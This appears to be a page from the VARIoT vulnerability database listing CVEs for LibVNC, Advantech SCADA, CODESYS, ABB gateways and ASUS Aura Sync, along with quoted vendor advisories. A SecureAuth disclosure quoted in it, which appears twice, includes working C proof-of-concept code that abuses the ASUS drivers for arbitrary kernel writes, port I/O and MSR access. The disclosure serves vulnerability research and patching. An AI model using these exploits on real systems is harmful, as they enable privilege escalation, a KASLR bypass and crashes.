VARIoT IoT vulnerabilities database
| VAR-201812-1202 | CVE-2018-20019 | LibVNC Vulnerable to out-of-bounds writing | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
LibVNC before commit a83439b9fbe0f03c48eb94ed05729cb016f8b72f contains multiple heap out-of-bounds write vulnerabilities in VNC client code that can result in remote code execution. LibVNC contains an out-of-bounds write vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). LibVNCServer is prone to multiple heap-based buffer-overflow vulnerabilities.
Attackers can exploit these issues to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition.
Versions prior to LibVNCServer 0.9.12 are vulnerable.
For the stable distribution (stretch), these problems have been fixed in
version 0.9.11+dfsg-1.3~deb9u1.
We recommend that you upgrade your libvncserver packages.
For the detailed security status of libvncserver please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/libvncserver
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201908-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: LibVNCServer: Multiple vulnerabilities
Date: August 09, 2019
Bugs: #659560, #673508
ID: 201908-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in LibVNCServer, the worst of
which could result in the arbitrary execution of code.
Background
==========
LibVNCServer/LibVNCClient are cross-platform C libraries that allow you
to easily implement VNC server or client functionality in your program.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/libvncserver < 0.9.12 >= 0.9.12
Description
===========
Multiple vulnerabilities have been discovered in LibVNCServer. Please
review the CVE identifiers referenced below for details.
Impact
======
Please review the referenced CVE identifiers for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All LibVNCServer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/libvncserver-0.9.12"
References
==========
[ 1 ] CVE-2018-20019
https://nvd.nist.gov/vuln/detail/CVE-2018-20019
[ 2 ] CVE-2018-20020
https://nvd.nist.gov/vuln/detail/CVE-2018-20020
[ 3 ] CVE-2018-20021
https://nvd.nist.gov/vuln/detail/CVE-2018-20021
[ 4 ] CVE-2018-20022
https://nvd.nist.gov/vuln/detail/CVE-2018-20022
[ 5 ] CVE-2018-20023
https://nvd.nist.gov/vuln/detail/CVE-2018-20023
[ 6 ] CVE-2018-20024
https://nvd.nist.gov/vuln/detail/CVE-2018-20024
[ 7 ] CVE-2018-7225
https://nvd.nist.gov/vuln/detail/CVE-2018-7225
[ 8 ] CVE-2018-7226
https://nvd.nist.gov/vuln/detail/CVE-2018-7226
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201908-05
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
=========================================================================
Ubuntu Security Notice USN-4587-1
October 20, 2020
italc vulnerabilities
=========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in iTALC.
Software Description:
- italc: didactic tool which allows teachers to view and control computer labs
Details:
Nicolas Ruff discovered that iTALC had buffer overflows, divide-by-zero errors
and didn't check malloc return values. (CVE-2016-9941, CVE-2016-9942)
It was discovered that iTALC had an out-of-bounds write, multiple heap
out-of-bounds writes, an infinite loop, improper initializations, and null
pointer vulnerabilities. (CVE-2018-15127, CVE-2018-20019, CVE-2018-20020,
CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024,
CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225,
CVE-2019-15681)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
italc-client 1:2.0.2+dfsg1-4ubuntu0.1
italc-master 1:2.0.2+dfsg1-4ubuntu0.1
libitalccore 1:2.0.2+dfsg1-4ubuntu0.1
In general, a standard system update will make all the necessary changes.
References:
https://usn.ubuntu.com/4587-1
CVE-2014-6051, CVE-2014-6052, CVE-2014-6053, CVE-2014-6054,
CVE-2014-6055, CVE-2016-9941, CVE-2016-9942, CVE-2018-15127,
CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022,
CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749,
CVE-2018-20750, CVE-2018-7225, CVE-2019-15681
Package Information:
https://launchpad.net/ubuntu/+source/italc/1:2.0.2+dfsg1-4ubuntu0.1
| VAR-201812-0480 | CVE-2018-18999 | WebAccess/SCADA Input validation vulnerability | CVSS V2: 7.5 | CVSS V3: 7.3 | Severity: HIGH |
WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. WebAccess/SCADA contains an input validation vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Advantech WebAccess/SCADA is a suite of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment.
A buffer overflow vulnerability exists in Advantech WebAccess/SCADA version 8.3.2 based on the Windows 2008 R2 SP1 platform that could allow an attacker to execute arbitrary code or cause a denial of service in the context of an affected application. Advantech WebAccess/SCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions.
Advantech WebAccess/SCADA version 8.3.2 is vulnerable.
| VAR-201902-0732 | CVE-2018-20026 | CODESYS V3 Product vulnerabilities | CVSS V2: 5.0 | CVSS V3: 7.5 | Severity: HIGH |
Improper Communication Address Filtering exists in CODESYS V3 products in versions prior to V3.5.14.0. CODESYS V3 products contain unspecified vulnerabilities. Information may be obtained. 3S-Smart CODESYS Control for BeagleBone and the other products listed below are programming software products of the German company 3S-Smart Software Solutions for industrial control system development.
A security vulnerability exists in several 3S-Smart Software Solutions products, which stems from programs that do not properly restrict communication channels. An attacker could use this vulnerability to impersonate the source of a communication packet. The following products are affected: 3S-Smart CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Development System, CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities:
1. An insecure random number generator weakness
3. A spoofing vulnerability
An attacker can exploit these vulnerabilities to bypass security restrictions, perform certain unauthorized actions, and insert and display spoofed content. Other attacks are also possible.
| VAR-201902-0731 | CVE-2018-20025 | CODESYS Insufficient Random Value Usage Vulnerability in Products | CVSS V2: 5.0 | CVSS V3: 7.5 | Severity: HIGH |
Use of Insufficiently Random Values exists in CODESYS V3 products in versions prior to V3.5.14.0. The CODESYS products contain an insufficient-random-value vulnerability. Information may be obtained. 3S-Smart CODESYS Control for BeagleBone and the other products listed below are programming software products of the German company 3S-Smart Software Solutions for industrial control system development.
A number of 3S-Smart Software Solutions products have security vulnerabilities that result from programs using values with insufficient randomness. An attacker could use this vulnerability to affect the confidentiality and integrity of the data. The following products are affected: 3S-Smart CODESYS Control for BeagleBone; CODESYS Control for emPC-A / iMX6; CODESYS Control for IOT2000; CODESYS Control for Linux; CODESYS Control for PFC100; CODESYS Control for PFC200; CODESYS Control for Raspberry Pi; CODESYS Control RTE V3; CODESYS Control RTE V3 (for Beckhoff CX); CODESYS Control Win V3 (part of CODESYS Development System setup); CODESYS Control V3 Runtime System Toolkit; CODESYS V3 Embedded Target Visu Toolkit; CODESYS V3 Remote Target Visu Toolkit; CODESYS V3 Safety SIL2; CODESYS Gateway V3; CODESYS HMI V3; CODESYS OPC Server V3; CODESYS PLCHandler SDK; CODESYS V3 Development System; CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities:
1. An insecure random number generator weakness
3. A spoofing vulnerability
An attacker can exploit these vulnerabilities to bypass security restrictions, perform certain unauthorized actions, and insert and display spoofed content. Other attacks are also possible.
| VAR-201901-0861 | CVE-2018-18995 | ABB GATE-E1 and GATE-E2 Vulnerabilities related to lack of authentication for critical functions | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
Pluto Safety PLC Gateway Ethernet devices ABB GATE-E1 and GATE-E2, all versions, do not allow authentication to be configured on the administrative telnet or web interfaces, which could enable various attack vectors, including conducting device resets, reading or modifying registers, and changing configuration settings such as IP addresses. ABB GATE-E1 and GATE-E2 are vulnerable to a lack of authentication for critical functions. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). ABB GATE-E2 is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
Attackers can exploit these issues to execute arbitrary code in the context of the browser and obtain sensitive information; other attacks may also be possible. Both ABB GATE-E1 and GATE-E2 are Ethernet gateway devices from the Swiss company ABB. A security vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL Oct 2018), which stems from the fact that the devices do not allow authentication to be configured on the management telnet or web interface. An attacker could exploit this vulnerability to reset the device, read or modify registers, and modify configuration settings such as the IP address.
| VAR-201901-0862 | CVE-2018-18997 | ABB GATE-E1 and GATE-E2 Vulnerable to cross-site scripting | CVSS V2: 4.3 | CVSS V3: 6.1 | Severity: MEDIUM |
Pluto Safety PLC Gateway Ethernet devices ABB GATE-E1 and GATE-E2, all versions, allow an unauthenticated attacker using the administrative web interface to insert an HTML/JavaScript payload into any of the device properties, which may allow an attacker to display or execute the payload in a visitor's browser. ABB GATE-E1 and GATE-E2 contain a cross-site scripting vulnerability. Information may be obtained and information may be altered. ABB GATE-E1 and GATE-E2 are Ethernet gateway devices from ABB, Switzerland. A cross-site scripting vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL Oct 2018) that can be exploited by remote attackers to inject HTML/JavaScript payloads into arbitrary device properties and have them displayed or executed in a visitor's browser.
Attackers can exploit these issues to execute arbitrary code in the context of the browser and obtain sensitive information; other attacks may also be possible.
| VAR-201812-0059 | CVE-2018-18535 | ASUS Aura Sync Access control vulnerability | CVSS V2: 7.2 | CVSS V3: 7.8 | Severity: HIGH |
The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Model Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync contains an access control vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions.
ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected.
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
*1. *Advisory Information**
Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release
*2. *Vulnerability Information**
Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
*3. *Vulnerability Description**
ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.
*4. *Vulnerable Packages**
.
*5. *Vendor Information, Solutions and Workarounds**
The vendor did not provide fixes or workaround information.
*6. *Credits**
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.
*7. *Technical Description / Proof of Concept Code**
Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application. From now on addressed as
"Asusgio" and "GLCKIo". Default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.
The following sections describe the problems found.
*7.1. *Arbitrary ring0 write**
[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo leading to write of arbitrary DWORD to an arbitrary address.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38]   ; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56]   ; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx                ; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept:
/-----
#include <windows.h>
#include <stdio.h>   // printf, getchar
#include <tchar.h>   // _tmain, _TCHAR
HANDLE ghDriver = 0;
#define IOCTL_GLCKIO_VMWRITE 0x80102050
typedef struct _STRUCT_GLCKIO_VMWRITE {
WORD unk0;
DWORD unk1_1;
WORD unk1_2;
ULONG64 unk2;
ULONG64 unk3;
ULONG64 unk4;
ULONG64 unk5;
ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
mystructIn.unk0 = 0xf11;
mystructIn.unk1_1 = value; // value
mystructIn.unk5 = dest; // address
STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
&returned, NULL);
return BOOL(returned);
}
BOOL InitDriver()
{
ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
GetLastError());
return FALSE;
}
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for instant BSOD\n");
getchar();
ArbitraryWriteDWORD(0, 0xffffffff);
CloseHandle(ghDriver);
return 0;
}
-----/
*7.2. *Port mapped I/O access**
[CVE-2018-18536]
Both GLCKIo and Asusgio expose a functionality to read/write data
from/to IO ports. This could be leveraged in a number of ways to
ultimately run code with elevated privileges.
/-----
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this
// functionality to work unless IoIs32bitProcess == TRUE. They set rdx
// as a pointer instead of a port number on the in/out instruction...
// and they ONLY do this incorrectly in the x64 process specific code.(!?)
#include "stdafx.h"
#include <windows.h>
// for \\.\glckio
#define IOCTL_GLCKIO_WRITEPORT 0x80102054
#define IOCTL_GLCKIO_READPORT 0x80102050
// for \\.\Asusgio
#define IOCTL_ASIO_PORTREADB 0xA0406400
#define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);
#pragma pack (push,1)
typedef struct {
DWORD DriverIndex; // DriverEnum index
BYTE DeviceName[MAX_PATH];
fnPMIOReadB pPMIOReadB;
fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum {
ASIO = 1,
GLCKIO,
};
typedef struct _ASIO_PORTIO_STRUCT {
DWORD port;
ULONG64 value;
} ASIO_PORTIO_STRUCT;
typedef struct _GLCKIO_PORTIO_STRUCT {
WORD port;
DWORD value;
DWORD datalen;
} GLCKIO_PORTIO_STRUCT;
#pragma pack(pop)
// Sends the IOCTL with the caller's local 'inbuffer' and returns the first output byte.
// (Line continuations restored; the macro must end before the next function definition.)
#define IOCTLMACRO(iocontrolcode, size) \
BYTE outbuffer[0x30] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, size, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[0];

BYTE GLCKIO_PMIOReadB(WORD port)
{
GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1};
IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)
}
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)
{
GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };
IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)
}
BYTE ASIO_PMIOReadB(WORD port)
{
ASIO_PORTIO_STRUCT inbuffer = { port, 0 };
IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)
}
BYTE ASIO_PMIOWriteB(WORD port, BYTE value)
{
ASIO_PORTIO_STRUCT inbuffer = { port, value };
IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)
}
void Reboot()
{
BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
Sleep(50);
gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
Sleep(50);
}
BOOL InitDriver()
{
char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" };
BYTE i = 0;
for (i = 0; i<2; i++) {
ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ |
GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\' - GetLastError:%d\n", szDeviceNames[i], GetLastError());
continue;
}
gConfig.DriverIndex = i+1;
memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
break;
}
switch (gConfig.DriverIndex) {
case DriverEnum::ASIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB;
gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB;
}
break;
case DriverEnum::GLCKIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB;
gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB;
}
break;
default:
break;
}
return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (PMIO access)\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName,
(DWORD)ghDriver);
printf("press ENTER for hard reset...");
getchar();
Reboot();
CloseHandle(ghDriver);
}
-----/
*7.3.
Proof of Concept:
/-----
// This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR
// register value (leaks a kernel function pointer bypassing KASLR) and
// then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>   // printf, getchar
#include <tchar.h>   // _tmain, _TCHAR
// for \\.\Asusgio
#define IOCTL_ASIO_RDMSR 0xA0406458
#define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASIO_MSRIO_STRUCT {
DWORD reg;
ULONG64 value;
} ASIO_MSRIO_STRUCT;
#pragma pack(pop)
// Sends the IOCTL with the caller's local 'inbuffer' and returns the first output QWORD.
// (Line continuations restored; the macro must end before the next function definition.)
#define IOCTLMACRO(iocontrolcode, size) \
ULONG64 outbuffer[2] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, size, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[0];

ULONG64 ASIO_RDMSR(DWORD reg)
{
ASIO_MSRIO_STRUCT inbuffer = { reg };
IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)
}
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)
{
ASIO_MSRIO_STRUCT inbuffer = { reg, value };
IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)
}
BOOL InitDriver()
{
ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ |
GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\' - GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError());
return FALSE;
}
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (MSR access)\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
printf("press ENTER for instant BSOD\n");
getchar();
ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222ULL); // return value unused (undeclared 'a' removed)
CloseHandle(ghDriver);
}
-----/
*8. *Report Timeline**
2017-11-27: SecureAuth sent an initial notification to ASUS, asking for
GPG keys.
2017-12-14: SecureAuth sent a second notification to ASUS.
2018-01-29: SecureAuth sent a third notification to ASUS.
2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report
with technical information.
2018-01-31: SecureAuth sent Asus a draft version of the advisory.
2018-02-07: SecureAuth requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-14: SecureAuth again requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-21: Asus acknowledged SecureAuth's draft report and asked for
time for internal investigations.
2018-02-21: Asus answered saying that they were planning to update Aura
in April.
2018-02-21: SecureAuth thanked Asus's feedback and requested a regular
contact until the Auras update.
2018-03-19: SecureAuth asked for a status update.
2018-03-26: SecureAuth asked for a status update again.
2018-03-26: SecureAuth asked Asus to confirm if this new version had
been already released.
2018-04-03: SecureAuth requested a status update.
2018-04-16: SecureAuth requested a confirmation for Asus.
2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported
vulnerabilities. For that reason, SecureAuth requested a clarification
about the case. In this context, SecureAuth requested a new clarification.
2018-07-03: SecureAuth requested a status update.
2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
*9. *References**
[1] https://www.asus.com/support
*10. *About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
*11. *About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com
*12. *Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201812-0060 | CVE-2018-18536 | ASUS Aura Sync Vulnerabilities in authorization, authority and access control | CVSS V2: 7.2 | CVSS V3: 7.8 | Severity: HIGH |
The GLCKIo and Asusgio low-level drivers in ASUS Aura Sync v1.07.22 and earlier expose functionality to read/write data from/to I/O ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. ASUS Aura Sync contains vulnerabilities in authorization, authority, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions.
ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
*1. *Advisory Information**
Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release
*2. *Vulnerability Information**
Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
*3. *Vulnerability Description**
ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.
*4. *Vulnerable Packages**
.
*5. *Vendor Information, Solutions and Workarounds**
The vendor did not provide fixes or workaround information.
*6. *Credits**
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.
*7. *Technical Description / Proof of Concept Code**
Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application. From now on addressed as
"Asusgio" and "GLCKIo". Default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.
The following sections describe the problems found.
*7.1. *Arbitrary ring0 write**
[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo leading to write of arbitrary DWORD to an arbitrary address.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38]
; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56]
; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx
; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept:
/-----
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
HANDLE ghDriver = 0;
#define IOCTL_GLCKIO_VMWRITE 0x80102050
// Input buffer layout as recovered from the driver; the purpose of the
// fields is unknown except where noted below.
typedef struct _STRUCT_GLCKIO_VMWRITE {
    WORD unk0;
    DWORD unk1_1;
    WORD unk1_2;
    ULONG64 unk2;
    ULONG64 unk3;
    ULONG64 unk4;
    ULONG64 unk5;
    ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;
// Writes 'value' to the kernel-mode address 'dest' through the unchecked
// store shown in the disassembly above.
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
    STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
    mystructIn.unk0 = 0xf11;   // value the handler expects here (purpose not documented)
    mystructIn.unk1_1 = value; // value
    mystructIn.unk5 = dest;    // address
    STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
    DWORD returned = 0;
    DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
        sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
        &returned, NULL);
    return (BOOL)(returned != 0);
}
